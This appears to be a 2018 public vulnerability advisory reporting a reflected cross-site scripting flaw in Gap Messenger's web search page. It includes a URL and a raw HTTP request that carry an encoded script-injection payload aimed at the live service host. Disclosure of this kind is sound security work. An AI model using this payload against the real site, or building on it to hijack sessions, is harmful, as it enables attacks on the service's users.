Gap Messenger Cross Site Scripting Vulnerability

2018.04.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[-] Exploit Title: Gap Messenger Cross Site Scripting [-] Vendor Homepage : https://gap.im/en/ [-] Author: Milad Ahmadi [-] Email: info@securityhub.ir [-] Date : 2018-04-08 [-] Tested on Windows 10 --------------------------------------------------------------------- [ Description] # Gap Messenger is free cloud-based messenger with multi-device capability . this messenger is vulnerable to cross-site scripting vulnerability . --------------------------------------------------------------------- [ Vulnerable URL ] # https://world.gap.im/page/search_service/child?q=%22%3E%3Cscript%3Ealert(%27Xss_By_Milad%27)%3C%2fscript%3Ead --------------------------------------------------------------------- [ Request ] GET /page/search_service/child?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%30%29%3c%2f%73%63%72%69%70%74%3ead HTTP/1.1 Host: world.gap.im Accept: */* Accept-Language: en Connection: close --------------------------------------------------------------------- Twitter : @securityhub Virgool : @securityhub


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top